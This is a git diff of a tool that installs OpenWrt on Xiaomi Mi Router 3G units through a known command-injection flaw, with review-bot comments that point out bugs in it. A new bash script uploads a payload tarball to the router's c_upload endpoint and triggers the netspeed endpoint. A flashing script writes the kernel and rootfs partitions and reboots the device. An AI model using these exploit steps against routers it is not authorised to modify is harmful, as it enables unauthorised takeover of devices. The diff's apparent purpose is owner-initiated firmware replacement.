diff --git a/README.md b/README.md index 87df7cf..fdcd5d7 100644 --- a/README.md +++ b/README.md @@ -162,3 +162,11 @@ You can find solutions in the following links: ### Version 0.0.1: netcat (legacy) ![Alt Text](readme/exploit-001.gif) + +## A simple bash based version + +**TBD** this is in development and not yet tested. Use it if you know what are you doing. + +If you are on Windows and don't want to install Python you can try the plain shell script to install the OpenWrt. +You still need bash and curl but it comes with Git by default. +Open Bash shell and run: `bash ./setup_openwrt.bash` \ No newline at end of file diff --git a/extras/language/luci b/extras/language/luci index 1ac5a58..8b953c5 100644 --- a/extras/language/luci +++ b/extras/language/luci @@ -30,6 +30,3 @@ config internal 'ccache' config internal 'themes' option xiaoqiang '/xiaoqiang' option OpenWrt '/luci-static/openwrt.org' - -config 5 'debuglevel' - diff --git a/payload/install_openwrt.sh b/payload/install_openwrt.sh new file mode 100644 index 0000000..e078800 --- /dev/null +++ b/payload/install_openwrt.sh @@ -0,0 +1,9 @@ +#!/bin/ash +set -euo pipefail +[ -f ./openwrt-squashfs-kernel1.bin ] || exit +[ -f ./openwrt-squashfs-rootfs0.bin ] || exit +mtd write openwrt-squashfs-kernel1.bin kernel1 +mtd write openwrt-squashfs-rootfs0.bin rootfs0 +nvram set flag_try_sys1_failed=1 +nvram commit +reboot diff --git a/payload/speedtest_urls.xml b/payload/speedtest_urls.xml new file mode 100644 index 0000000..e7c02c1 --- /dev/null +++ b/payload/speedtest_urls.xml @@ -0,0 +1,32 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/remote_command_execution_vulnerability.py b/remote_command_execution_vulnerability.py index d1b1ab8..553f28e 100644 --- a/remote_command_execution_vulnerability.py +++ b/remote_command_execution_vulnerability.py 
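Review bot: The two existence checks in install_openwrt.sh bail out with a bare `exit` and no message, so a missing image makes the payload exit 0 and nothing upstream can tell the flash never happened; `[ -f ./openwrt-squashfs-kernel1.bin ] || { echo "kernel image missing" >&2; exit 1; }` (and the same for rootfs0) would make the failure visible. Nothing verifies the images before `mtd write`, which is the point of no return on the device: a truncated or tampered download gets written to kernel1/rootfs0 as-is, so shipping a sha256 list in the payload and running `sha256sum -c` before the first `mtd write` is worth the extra lines. The script runs under `#!/bin/ash` but uses `set -euo pipefail`; older BusyBox ash builds may reject `-o pipefail`, which is worth confirming on the stock firmware this targets.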
@@ -41,14 +41,14 @@ def get_stok(router_ip_address): try: r0 = requests.get("http://{router_ip_address}/cgi-bin/luci/web".format(router_ip_address=router_ip_address)) except: - print ("Xiaomi router not found...") + print ("Xiaomi router not found.") return None - try: + try: mac = re.findall(r'deviceId = \'(.*?)\'', r0.text)[0] + key = re.findall(r'key: \'(.*)\',', r0.text)[0] except: - print ("Xiaomi router not found...") + print ("Unable to find deviceId or key.") return None - key = re.findall(r'key: \'(.*)\',', r0.text)[0] nonce = "0_" + mac + "_" + str(int(time.time())) + "_" + str(random.randint(1000, 10000)) router_password = input("Enter router admin password: ") account_str = hashlib.sha1((router_password + key).encode('utf-8')).hexdigest() @@ -67,8 +67,8 @@ def get_stok(router_ip_address): stok = get_stok(router_ip_address) or input("You need to get the stok manually, then input the stok here: ") print("""There two options to provide the files needed for invasion: - 1. Use a local TCP file server runing on random port to provide files in local directory `script_tools`. - 2. Download needed files from remote github repository. (choose this option only if github is accessable inside router device.)""") + 1. Use a local TCP file server running on random port to provide files in local directory `script_tools`. + 2. Download needed files from remote github repository. (choose this option only if github is accessible inside router device.)""") use_local_file_server = (input("Which option do you prefer? (default: 1)") or "1") == "1" # From https://blog.securityevaluators.com/show-mi-the-vulns-exploiting-command-injection-in-mi-router-3-55c6bcb48f09 diff --git a/set_english.py b/set_english.py index 0d59b16..fe28036 100644 --- a/set_english.py +++ b/set_english.py 
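Review bot: The bare `except:` that now guards both `re.findall(...)[0]` lookups in get_stok swallows every exception, including KeyboardInterrupt and any bug in the regexes themselves, and reports them all as "Unable to find deviceId or key."; the only failure these two lines are expected to raise is `IndexError` on an empty match list, so `except IndexError:` keeps the message honest and lets anything else surface. The pre-existing bare `except:` around `requests.get` a few lines up has the same problem, and `except requests.RequestException:` is the matching narrow form there. get_stok continues outside the hunk.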
@@ -9,12 +9,13 @@ import os import ftplib -router_ip_address = input("Router IP address: ") -# router_ip_address = '192.168.0.21' +router_ip_address = "miwifi.com" +# router_ip_address = "192.168.31.1" +router_ip_address = input("Router IP address: [press enter for using the default '{}']".format(router_ip_address)) or router_ip_address session = ftplib.FTP(router_ip_address,'root','') -# Uploading a lenguage file will not succeed as the filesystem is ro +# Uploading a language file will not succeed as the filesystem is ro # languageFile = open('extras/language/i18n/base.en.lmo','rb') # session.storbinary('STOR /usr/lib/lua/luci/i18n/base.en.lmo', languageFile) # languageFile.close() diff --git a/setup_openwrt.bash b/setup_openwrt.bash new file mode 100755 index 0000000..4a2b5d4 --- /dev/null +++ b/setup_openwrt.bash 
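Review bot: The new default `router_ip_address = "miwifi.com"` is a DNS name that is passed straight to `ftplib.FTP(router_ip_address,'root','')`, so if the machine is not on the router's LAN when Enter is pressed, the name is resolved by whatever resolver is configured and the root/empty-password FTP login is attempted against that address rather than the router. The commit already leaves the LAN address commented out; making it the default, `router_ip_address = "192.168.31.1"`, keeps the same convenience without the off-network resolution, and a one-line comment stating that the hostname only resolves to the router from its own network would cover the remaining case. The rest of the script continues outside the hunk.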
@@ -0,0 +1,51 @@
+#!/bin/bash
+set -euo pipefail
+echo "The script will install OpenWrt firmware on the Xiomi router."
+echo "First we need to download the OpenWrt for your router model."
+
+payload_dir=$(mktemp -d)
+echo "Files will be downloaded to $payload_dir"
+
+echo "Please select your model:"
+echo "1. Xiomi 3G v1 (with USB) https://openwrt.org/toh/xiaomi/mir3g"
+echo "2. Xiomi 3G v2 without USB https://openwrt.org/toh/xiaomi/mir3g"
+echo "Type a number:"
+read router_model
+case "$router_model" in
+ "1")
+ echo "Download openwrt-22.03.0-ramips-mt7621-xiaomi_mi-router-3g"
+ curl -L https://downloads.openwrt.org/releases/22.03.0/targets/ramips/mt7621/openwrt-22.03.0-ramips-mt7621-xiaomi_mi-router-3g-squashfs-kernel1.bin -o "$payload_dir/openwrt-squashfs-kernel1.bin" -z "$payload_dir/openwrt-squashfs-kernel1.bin"
+ curl -L https://downloads.openwrt.org/releases/22.03.0/targets/ramips/mt7621/openwrt-22.03.0-ramips-mt7621-xiaomi_mi-router-3g-squashfs-rootfs0.bin -o "$payload_dir/openwrt-squashfs-rootfs0.bin" -z "$payload_dir/openwrt-squashfs-rootfs0.bin"
+ ;;
+ "2")
+ echo "Not implemented yet, sorry"
+ exit 3
+ ;;
+ *)
+ echo "Your select is wrong"
+ exit 2
+esac
+
+echo "Prepare payload.tar.gz"
+cp ./payload/* "$payload_dir"
+(cd "$payload_dir" && tar -I "gzip -1" -cvf /tmp/payload.tar.gz ./)
+echo "The payload.tar.gz is ready for a shot:"
+ls -l /tmp/payload.tar.gz
+
+router_url="http://miwifi.com/cgi-bin/luci/;stok=04a76647de2b1d602d43cd131573f8ac/web/home#router"
+echo ""
+echo "Now let's install the firmware on the router."
+echo "Reset router to it's factory settings with a needle pushed into a Reset hole."
+echo "Then connect to it's WiFi and open your router admin panel at http://miwifi.com"
+echo "Now set admin and wifi passwords and you'll see a dashboard."
+echo "The URL in browser's address bar should look like $router_url" +echo "Now copy and paste here it's URL:" +read router_url +# strip after stok +router_base_url=( $(sed -e 's/\(.*stok=.*\)\/web\(.*\)/\1/' <<< "$router_url") ) +echo router_base_url +curl -v -F 'image=@payload/payload.tar.gz' "$router_base_url/api/misystem/c_upload" +curl -v "$router_base_url/api/xqnetdetect/netspeed" +echo $? +echo "Now the router should reboot itself. Please wait for a minute." +echo "Try to connect with a cable and open OpenWrt Luci admin panel at http://192.168.1.1/" diff --git a/tcp_file_server.py b/tcp_file_server.py index ac430fd..1941a74 100644 --- a/tcp_file_server.py +++ b/tcp_file_server.py @@ -26,7 +26,7 @@ def run(self): self.server_thread = threading.Thread(target=self.server.serve_forever) self.server_thread.daemon = True self.server_thread.start() - print("local file server is runing on {}:{}. root='{}'".format(self.ip, self.port, self.server.root_dir)) + print("local file server is running on {}:{}. root='{}'".format(self.ip, self.port, self.server.root_dir)) def __exit__(self, exc_type, exc_val, exc_tb): self.server.shutdown()
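Review bot: The upload line `curl -v -F 'image=@payload/payload.tar.gz' ...` points at a file the script never creates: the tarball is written to `/tmp/payload.tar.gz` by the tar step and listed with `ls -l /tmp/payload.tar.gz`, so curl will fail to open the attachment and, with `set -e` in effect, the script stops before the netspeed request ever fires; it should read `curl -v -F 'image=@/tmp/payload.tar.gz' "$router_base_url/api/misystem/c_upload"`. `echo router_base_url` prints the literal name rather than the value, so the URL actually being hit is never shown; `echo "$router_base_url"` is what was intended, and the `echo $?` after the second curl can only ever print 0 under `set -e`. The downloaded kernel1/rootfs0 images are packed and flashed with no integrity check at all; fetching the `sha256sums` file from the same release directory and running `sha256sum -c` on the two relevant entries before the tar step would catch a truncated or tampered download before it reaches `mtd write` on the device. The `router_base_url=( $(sed ...) )` array assignment also word-splits and glob-expands the unquoted substitution, which is harmless for a well-formed URL but a plain quoted scalar assignment would be the safer form.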